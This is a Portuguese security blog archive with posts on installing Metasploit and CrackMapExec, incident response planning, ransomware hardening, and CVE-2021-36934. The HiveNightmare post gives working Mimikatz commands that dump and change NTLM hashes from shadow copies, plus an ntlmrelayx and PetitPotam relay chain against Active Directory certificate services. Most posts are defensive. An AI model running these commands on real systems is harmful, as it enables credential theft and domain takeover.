Nenhum sistema está seguro...

O objetivo deste site é o de gerar conhecimento na área Forense, Jurídica e tecnologica.

sexta-feira, 3 de setembro de 2021

Instalando o Metasploit no Debian

 Neste artigo veremos um em dois passos, como instalar o metasploit (Framework de Pentest) em uma máquina Debian. 

Obs.: Os textos em negrito são os comandos.

Primeiro, inicialize sua máquina debian e abra o Terminal como administrador, instale o curl. 


#>apt-get install curl

Segundo, copie e cole no mesmo terminal o comando abaixo, lembre-se, o comando tem que ser no estado que se encontra: 

#>curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \

  chmod 755 msfinstall && \

  ./msfinstall



Fonte: https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers

quinta-feira, 2 de setembro de 2021

PLANO DE RESPOSTA A INCIDENTE CIBERNÉTICO

 

PLANO DE RESPOSTA A INCIDENTE CIBERNÉTICO

OBJETIVO

  • Ter a capacidade e habilidade de lidar e responder a diferentes tipos de incidentes de cibersegurança de forma sistemática.
  • Garantir a capacidade de identificar, conter e se recuperar de um ataque.
  • Reintegrar as operações regulares da empresa o mais rápido possível e mitigar o impacto negativo nas operações de negócio.
  • Possuir políticas de segurança com eficácia e garantir que a qualidade dos serviços se mantenha nos níveis combinados.
  • Minimizar a perda e os efeitos pós violação.
  • Para a empresa, melhorar as habilidades no tratamento de incidentes e aumentar sua empregabilidade.

 

CONCEITO DE INCIDENT HANDLER

Manipulador de Incidentes - É um programa abrangente de nível especializado que transmite o conhecimento e as habilidades de que as organizações precisam para lidar com as consequências pós-violação, reduzindo o impacto do incidente, tanto do ponto de vista financeiro quanto de reputação.

Desta forma, é possível dizer que o Manipulador de Incidentes é um termo usado para descrever as atividades de um organização para identificar, analisar e corrigir perigos para prevenir uma recorrência futura. Esses incidentes dentro de uma estrutura organização são normalmente tratadas por um Incidente Equipe de Resposta (IRT) ou Equipe de Gerenciamento de Incidentes (IMT).

Essas equipes são frequentemente designadas de antemão ou durante o evento e são colocados no controle da organização enquanto o incidente é tratado, a fim de reter os processos de negócios.

CRIAÇÃO DE:

·       PROTOCOLO DE RESPOSTA DE CRISES CIBERNÉTICAS;

·       UM PLANO DE CONTINGÊNCIA;

·       MONITORAMENTO ATIVO E REATIVO;

Ideia central – Cada unidade (filial) terá um responsável direto treinado para relatar, avaliar (classificar) e tratar nos primeiros minutos ao identificar um evento. Uma vez identificado e classificado, o PLANO de Resposta a Incidentes irá:

1.     Levantar as informações e soluções;

2.     Investigar a causa e efeito;

3.     Avaliará o impacto no vazamento dos dados;

4.     Aplicará a devida Mitigação e Controles;

5.     Criará um Relatório Final.

Em conformidade ao NIST's Computer Security Incident Handling Guide, há um processo de Handling:


Figura 1 - Processo de Handling

 

SUGESTÃO PARA CRIAÇÃO DE UM TIME

MULTIDISCIPLINAR PARA RESPOSTA INCIDENTE


·      Identificar e quantificar pessoas para se juntar ao time;

·       Escolher o esquema do time, como local, centralizado ou times combinados;

·       Usar um time multidisciplinar:

  I.          Operações Jurídico

 II.          Recursos Humanos

III.          Relações Publicas

IV.          Recuperação de Desastres

 

·   Ideal é possuir pelo menos 10% do tempo destinado ao incidente handling. Estabelecer um baseline de tempo de resposta;

·       15 a 120 minutos dependendo da sensibilidade da infraestrutura da empresa;

·       Possuir um técnico experiente no site em um tempo determinado;

·       Pode não reportar ao incident handler team, mas fazer parte da unidade de negócio. Ter certeza que isto faz parte do Descrição do seu Trabalho para o time de suporte.

PREPARAÇÃO – CHECKLISTS

Administradores devem preparam check-lists e procedimentos para recuperar um sistema em seu controle:

·       Criar um breve documento por tipo de sistema;

·       Estabelecer um plano de compensação e visibilidade para o time. Obtendo acesso para sistemas e dados;

·       O time de incidente necessita possuir acesso aos sistemas para o respectivo fim que se destina;

·       Deve possuir senhas e chaves criptográficas de sistemas críticos.

 

PREPARAÇÃO E COMUNICAÇÃO

·       Criar uma lista de chamadas e estabelecer métodos de informar as pessoas rapidamente;

·       Obter um número de conferência que pode ser configurado com notificação instantânea (conceito de primeiro membro na cena deixa mensagens para outros)

·       Imprimir no tamanho de cartão de credito com uma lista de contatos do time de Incident Handling.

·       Testar a lista de contatos e árvore de contatos.

PREPRAÇÃO E RELACIONAMENTO

FORNECER FACILIDADES ENTRE AS COMUNICAÇÕES:

·       Educar usuários quando contratados;

·       Publicar a lista de indicadores de um incidente;

·       Usar mecanismos múltiplos como o telefone (hotline), e-mail e intranet;

·       Recompensar pelo reporting;

·       Atualizar a gerencia continuamente.

CULTIVAR RELACIONAMENTOS:

·       Ao time de campo, coordenar para que eles sejam: os olhos e ouvidos.

·       Atenção particular com o relacionamento com os administradores - envolve-los no time.

·       Conduzir treinamentos proativos;

·       Capacitar o time na leitura de log.

RELACIONAMENTO

TREINAR O TIME:

·       Realizar reuniões de treinamento/planejamento em cenários;

·       Fazer treinamentos de ferramentas e técnicas;

·       Considerar distribuir um honeypot interno para analise;

·       Estocar drivers de alta capacidade para praticar a realização de imagens forense;

·       Conduzir War Games - Fazer um pentest sem avisar e analisar a resposta do time. Principais problemas são as competências na criação de imagens forense e keyboard skills.

INCIDENT HANDLING

Incident Handling  é um plano de ação para lidar com o mal uso de redes e sistemas computacionais.

Figura 2 - Plano de Ação

O intuito é possuir procedimentos e políticas pré-definidas, desta forma será mais fácil aplicar rotinas de mitigação para contornar qualquer tipo de intrusão.

Cedo ou tarde, um incidente poderá acontecer, estas políticas determinarão quão preparadas o pátio computacional está e será crucial para manter a continuidade do negócio. 

O termo incidente refere-se a um evento adverso em um sistema de informação ou rede, ou ameaça iminente.

Exemplos de incidentes:

·       Uso de uma conta de forma não autorizada;

·       Uso de privilégios de sistemas não autorizados;

·       Execução de um código malicioso que irá destruir dado.

SUGESTÃO PARA PREPARAÇÃO:

Manter o ambiente e o time prontos para lidar com os incidentes. Neste quesito, aconselha-se a criação de um Banner de aviso em todos os sistemas utilizados pela empresa do tipo: “O uso, ou modificação indevido é proibida e será penalizado com o rigor das leis vigentes, o uso de todos os sistemas informatizados são monitorados e gravados”.  Sempre buscar revisão com o jurídico.

ABORDAGEM:

 

Figura 3 - Preparação

Para o uso de VPN, incluir um warning banner com um alerta explanando que todos os sistemas conectados são sujeitos a buscas remotas e estão sendo monitoradas. Incluir este alerta nas iniciativas de conscientização para o empregado.


Estabelecer uma política para lidar com incidentes relacionada a todas as partes envolvidas no negócio. Observe abaixo:

 

Figura 4 - Estabelecendo Políticas.

 Por fim, estas são as considerações sobre um Plano de Incidente.

terça-feira, 31 de agosto de 2021

Criando PDF Protegido por senha - Do Word ou Excel para pdf com senha

A Lei Geral de Proteção de Dados (LGPD) surge para cuidar de várias medidas que podem ser tomadas para reduzir o impacto em caso de vazamento de dados.

Neste sentido, a Lei é totalmente transparente quanto aos requisitos de proteção e segurança de dados pessoais, como pode ser observado no seu Artigo 6 inciso VII, que as empresas devem fazer a “utilização de medidas técnicas e administrativas aptas a proteger os dados pessoais de acessos não autorizados e de situações acidentais ou ilícitas de destruição, perda, alteração, comunicação ou difusão”.

Nesta premissa, decidir criar este pequeno artigo ensinando em 7 passos, colocar uma senha em um documento do word ou versões superiores do Suite Office. 

Aplica-se em versões do Office 2010 ou mais novas, não foi testado em versões anteriores. 

[1] Arquivo > [2] Salvar Como > [3] Selecione o Tipo de arquivo > [4] Escolha como PDF > [5] Clique em Opções > [6]  Marcar Criptografia e clicar em ok > [7]  digite uma senha, clique em ok e Salvar > Fim. 


Com o aplicativo aberto, no canto superior esquerdo, clique em Arquivo depois escolha a opção Salvar Como e aparecerá a tela abaixo.  

Figura 1 - Escolhendo o tipo de arquivo como pdf e clicando em Opções

Na figura 1, escolha um nome para o arquivo e logo abaixo deste campo é feita a seleção para indicar que o documento terá o formato do PDF, em Tipo


Figura 2 - Criando uma Senha

Após escolher este formato do arquivo como PDF, clique em opções e abrirá a tela da Figura 2, neste passo você precisa marcar a caixa de seleção "Criptografar o documento com uma senha", passo que abrirá a tela seguinte, visto logo abaixo na figura 3. 

 
Figura 3 - Após marcar a criptografia no documento, digite uma senha. 

Informe uma senha com uma combinação de letras e números e clique em ok. Neste momento também é possível indicar um local onde o arquivo será salvo, escolha e em seguida clique em salvar.


Fonte: Thiago Alvarenga.

terça-feira, 24 de agosto de 2021

Protegendo informações confidenciais e pessoais de violações de dados causadas por ransomware

Ransomware é uma forma de malware projetada para criptografar arquivos em um dispositivo, tornando quaisquer arquivos e os sistemas que dependem deles inutilizáveis. Atores criminosos então exigem resgate em troca da descriptografia. Nos últimos anos, incidentes de ransomware têm se tornado cada vez mais prevalentes entre as entidades governamentais estaduais, locais, tribunais e territoriais da nação e organizações de infraestrutura crítica.


 1 - Resolver os itens relacionados ao Assessment do seu AD com o uso do PingCastle

Neste item, partimos inicialmente para: 

1.1 Criação da OU no AD de Suporte e nela, todos os usuários de suporte. Para empresas que usam uma senha padrão de suporte, esta é a recomendação. 

1.2 Configuração do LAPS;

1.3 Monitorar tentativas de acesso na porta 427

1.4 Monitorar bloqueio de contas no Active Directory ou LDAP por tentativa de login falhas (account lockout) 

1.5 Criar regra de monitoração de força bruta de autenticação em AD e autenticação Local. X tentativas falhas de login dentro intervalo Y seg. 

1.6 Monitorar tentativas de acesso por meio de pass-the-hash - userName != “ANONYMOUS LOGON” 

Microsoft-Windows-Security-Auditing = 4624 

Microsoft-Windows-Security-Auditing = 4625 

LogonProcessName = 'NtLmSsp' 


1.7 Verificar com o fabricante da solução de endpoint protection (BitDefender) tem funcionalidades que podem ser habilitadas para proporcionar ou aprimorar a proteção contra Ransomware; 

1.8 Ativar assinaturas de proteção para e mitigar estas principais publicações CVEs:

a. CVE-2020-1472 - Windows Zero Logon;

b. CVE-2019-5544 / CVE-2020-3992 - VMware;

c. CVE-2019-19781 - Citrix;

d. CVE-2020-0796 - Windows SMB;

e. CVE-2018-13379 - Fortnet;            

1.8.1 Evite expor a porta de serviço RDP para a internet, os atacantes podem utilizá-la por meio de uma credencial roubada/forjada/Força Bruta. Este e os e-mails são consideradas as maiores portas de entrada para ataques com campanhas de ransomware.    

18.1 Processo "lsass.exe", este é um dos processos mais importantes do Windows e crucial para um ataque bem sucedido em campanhas de ransomware. Especificamente o Lsass (Local Security Authority Subsystem Service) é um processo responsável por impor uma política de segurança no sistema, ele verifica os usuários que se conectam a um computador ou servidor      Windows, lida com alterações de senha e cria tokens de acesso. Finalizar este processo caracteriza na reinicialização do sistema operacional e resulta em perda de acesso do sistema a qualquer conta de usuários, incluindo o NT AUTHORITY.

Recomendação sobre o Isass:

Ative o Credential Guard no Windows 10. Este recurso vai impedir a coleta de hashes e tokens diretamente do processo LSASS;

Em atividades remotas de gerenciamento, dê preferência ao uso de Powershell Remoting via Invoke-Command ou Enter-PSSession. Desta forma, a credencial administrativa não ficará disponível no sistema remoto;

https://medium.com/sidechannel-br/mimikatz-mitigando-ataques-de-roubo-de-credenciais-f18eddd32b34

https://docs.microsoft.com/pt-br/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection

Desativar o WDigest: 

Destinado para as versões Windows 7, Windows 8, Windows Server 2008R2 e Windows Server 2012, primeiro aplica-se o pacote de atualização KB2871997. 

 Após a aplicação do KB, é recomendado validar se o WDigest está desabilitado no registro, observando a chave de registro abaixo:

 

 

1.9 Habitar, caso disponível, a funcionalidade de firewall e IPS de endpoint para identificar situações de exploração de vulnerabilidades ou ações maliciosas de forma lateral, no ambiente de rede local; 

1.10 Verificar na solução de endpoint protection os registros de riscos de segurança e malwares identificados para tentar identificar um possível vetor de ataque, e se prevenir de futuras ações; 

1.11 Verificar se os atualizações do sistema operacional e aplicações dos servidores e estações de trabalho foram realizadas; 

1.12 Caso possível, desabilitar temporariamente mapeamentos de rede para tentar conter a propagação das ações de um malware; 

1.13 Solicitar aos usuários realizar a troca de senha fazendo uso de uma política de senha previamente definida;

 

2 Continuar o Hardering do AD 

2.1 - Defesas de KERBEROASTING e ASP-REP Roasting

a - Localize todos os usuários com pré autenticação de kerberos e desative. Use o relatório do pingle castle.

b - Localize contas com SPN e remova os spn que não são necessários.

c - Fortaleça a senha de todas as contas que devem possuir o SPN para mais de 32 caracteres;

d - Restrinja ao máximo o compartilhamento via SMB (porta 445). Nas estações de trabalho, onde este recurso não deveria estar disponível, restrinja via recurso da solução de segurança e endpoint. Entre segmentos de rede, permita a comunicação desta porta onde for estritamente necessário.

e - É extremamente recomendado usar o Domain Protected Users. Este recurso vai fazer com que os usuários do grupo Protected Users não possam criar tokens delegados — mesmo em sessões interativas. Isso vai evitar a exposição desnecessária de tokens nos hosts da rede. É importante notar, no entanto, que as contas deste grupo não terão permissão para qualquer tarefa administrativa.

2.1 - Hardening CIS

    Credencial

        - KRBTGT reset

        - LAPS

        - Modo protegido do LSASS

        - Credencial GUARD

        - Proibir logon de rede de administrador local


2.2 - Consciência situacional

        - NetCease

2.3 - Proteção na rede

        - Desativar o NETBIOS e LLMNR

        - Assinar  SMB

        - Forcar NTLMv2 para a rede

2.4 - Proteções adicionais

        - IPSEC

        - Port security no switch ou fixar o mac addres de gateways nos hosts

        - Bloquear comunicação entre estações de trabalha na porta 445

        - Desativar compartilhamento administrativos C$ ADMIN$ IPC$

        - modificar SMB para versão 2 ou 3

        - configurar politica no serviço de WMI para permitir comunicação somente com servidores         de monitoramento

Estas foram algumas dicas que podem ser aplicadas para ajudar a mitigar as campanhas criminosas de ransomware. É importante lembrar que novas vulnerabilidades surgem todos os dias e com elas novas portas de entradas, o recomendado é que a segurança da informação esteja dentro do escopo da continuidade do negócio. 

Fonte:  





https://morphuslabs.com/recomenda%C3%A7%C3%B5es-para-mitiga%C3%A7%C3%A3o-de-riscos-de-incidentes-com-ransomware-b9a3efdf8bb5 

https://medium.com/sidechannel-br/mimikatz-mitigando-ataques-de-roubo-de-credenciais-f18eddd32b34




segunda-feira, 9 de agosto de 2021

Instalação do CrackMapExec

 

Tela de instalação do CrackMapExec

CrackMapExec é uma ferramenta pós-exploração que ajuda automatizar a avaliação de segurança de uma infraestrutura que utiliza o Active Directory (AD). Sua base está sob o conceito Living off the Land, ou seja, usar os protocolos/recursos do AD com o intuito de passar despercebido das soluções de Endpoint e Firewalls. Ele pode ser utilizado em paralelo com o PingCastle para encontrar possíveis inconformidades de configurações do AD. 

Instalação

1 Passo, baixe usando o comando abaixo:

git clone https://github.com/byt3bl33d3r/CrackMapExec.git


2 Passo, entre na pasta CrackMapExec e execute este comando:

python3 -m pip install pipx

3 Passo, execute o terceiro comando:
pipx ensurepath

4 Passo, execute o terceiro comando:
pipx install crackmapexec

5 Passo, execute o terceiro comando:
apt-get install python3-venv

6 Passo, execute o terceiro comando:
pipx install crackmapexec

7 Passo, atualizações de requisitos:
pip install -r requirements.txt
pip install -r requirements-dev.txt

8 - Passo, instalação de outros requisitos:

apt-get install -y libssl-dev libffi-dev python-dev build-essential

9 - Passo, instalação Poetry 
install curl
curl -sSL https://raw.githubusercontent.com/sdispater/poetry/master/get-poetry.py | python
Retrieving Poetry metadata
10 Passo, vá até o diretório home e execute o código abaixo:
source $HOME/.poetry/env

Para facilitar o entendimento, estou compartilhando todas saídas dos comandos realizado para 
obter-se êxito. Copie todo o texto, cole-o no bloco de notas e salve-o como html.
Link: http://dontpad.com/crackmapexecinstall
Nota importante: Execute-o sempre pela pasta home. 
Fonte:
https://infosecwriteups.com/forest-an-asreproast-dcsync-and-golden-ticket-hackthebox-walkthrough-ade8dcdd1ee5
https://www.redbelt.com.br/blog/2021/01/21/o-poder-do-crackmapexec/

terça-feira, 3 de agosto de 2021

Forçando a instalação do PIP erro: Can't roll back cryptography; was not uninstalled

 Problema:

Ao instalar o Impacket - Requerimento do Petitpotam, destes passos abaixo, foi encontrado o erro supracitado. 

Dentro da pasta opt/impacket

Passo 1: git clone https://github.com/SecureAuthCorp/impacket.git

Passo 2: sudo pip3 install -r /opt/impacket/requirements.txt

Passo 3: sudo python3 /opt/impacket/setup.py install

Objetivo: Rodar o exploit Petitpotam, um dos requisitos conforme o seu README, vejamos: 

O Python requer a instalação do Impacket, o Windows PoC foi feito na Comunidade VS 2019. Se houver problema de compilação, lembre-se de adicionar Rpcrt4.lib no vinculador. Compile em x86.

Solução - Abra um terminal e digite estes dois comandos:

Comando 1: python -m pip install --upgrade --force-reinstall pip

Para Python3 versão:


Comando 2: python3 -m pip install --upgrade --force-reinstall pip


Após este procedimento, prossiga com os passos: 

Passo2 e Passo3. 

quinta-feira, 29 de julho de 2021

Vulnerabilidade de Escalação de Privilégios Zero-day CVE-2021-36934

Divulgada no dia 20 deste mês, esta é uma vulnerabilidade que um hacker pode utilizar para alcançar níveis mais elevados de privilégios de uma determinada máquina e por conseguinte se movimentar até alcançar o Active Directory, possibilitando explorar outros níveis de acesso dentro da infraestrutura. 

Não há atualização disponível, contudo, a Microsoft lançou uma pequena recomendação para mitigação: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934


Figura 1 - Sistema operacional afetado com atualização mais recente

O Windows 11 ainda nem foi lançado, mas a vulnerabilidade SeriousSAM / HiveNightmare da Microsoft relatada recentemente (CVE-2021-36934) afeta a ele e aos atuais sistemas operacionais Windows 10 onipresentes. 

Outro link para fonte de pesquisa e exemplo de mitigação: 

https://www.bleepingcomputer.com/news/microsoft/new-windows-10-vulnerability-allows-anyone-to-get-admin-privileges/


TESTE BÁSICO  


Figura 2 - Digite o comando: icacls c:\windows\system32\config\sam

Se o retorno do comando apresentar a tela desta figura 2, o seu ambiente está vulnerável.  Sobre a legenda acima, os atributos do resultado do comandos significam que: 

(I) - permissão herdada do contêiner pai

RX - racesso para ler e executar


TESTE AVANÇADO

1 - icacls c:\windows\system32\config\sam

2 - Por exemplo, os agentes de ameaças podem usar o seguinte caminho de namespace de dispositivo Win32 para cópias de volume de sombra abaixo para acessar o arquivo SAM por qualquer usuário no computador.

\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM

3 - Usando essas permissões de arquivo baixas e incorretas, junto com cópias de volume de sombra dos arquivos, o pesquisador de segurança e criador do Mimikatz  Benjamin Delpy  disse ao BleepingComputer que você poderia facilmente roubar a senha com hash NTLM de uma conta elevada para obter privilégios mais altos.

Esse ataque é demonstrado no vídeo abaixo criado por Delpy e compartilhado com BleepingComputer que mostra Mimikatz usando um hash NTLM para obter privilégios de depuração.




no Mimikatz 2.2.0x64


COMANDO 1:

lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM


COMANDO 2:

lsadump::changentlm /user:"Gentil kiwi" /oldntlm:cc36cf7a8514893efccd332446158b1a[tiquete correspondente] /newpassword:password[senha qualquer]


Abra a nova aba ou sessão do mimikatz e digite: privilege::debug

a saída tem que ser algo desete tipo: "Privilege '20' ok".


Figura 3 - Prova de conceito usando o Mimikatz


Os passos abaixo merecem os créditos ao professor Ricardo Tavares.
 


1 - Usar este impacket


git clone https://github.com/ExAndroidDev/impacket
cd impacket
git checkout ntlmrelayx-adcs-attack
python3 -m pip install .

estas mudancas ainda não estavam na build nova

2 - Comando do relay (onde neotrantor é o servidor de certificados)

sudo ntlmrelayx.py -debug  -t http://neotrantor.foundation.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

3 - Comando do petitpotam 

Linux
./Petitpotam.py -u '' -p '' -d '' 172.16.207.13 trantor.foundation.local (onde o .13 é o linux seu e o trantor o AD)

ou  no mimikatz

misc::efs /server:172.16.207.11 /connect:172.16.207.13 /noauth (onde 11 é o AD e 13 é o seu linux)

Ferramentas utilizadas: impacket: git clone https://github.com/ExAndroidDev/impacket cd impacket git checkout ntlmrelayx-adcs-attack python3 -m pip install . Exploit PetitPotam: https://github.com/topotam/PetitPotam Mimikatz: https://github.com/gentilkiwi/mimikat... Mitigação: https://support.microsoft.com/en-us/t... Regra de deteção no formato SPLUNK: index=windows EventCode=4768 Certificate_Issuer_Name=*



Fonte: 

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934

https://www.bleepingcomputer.com/news/microsoft/new-windows-10-vulnerability-allows-anyone-to-get-admin-privileges/

https://support.microsoft.com/en-gb/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429

https://conversantgroup.com/serioussam-and-petitpotam-vulnerabilities-affects-windows-operating-systems/

Análise da Vulnerabilidade CVE-2024-23113 no FortiGate

  Relatório Técnico: Análise da Vulnerabilidade CVE-2024-23113 no FortiGate e Medidas de Mitigação Introdução Nos últimos anos, as vulnerabi...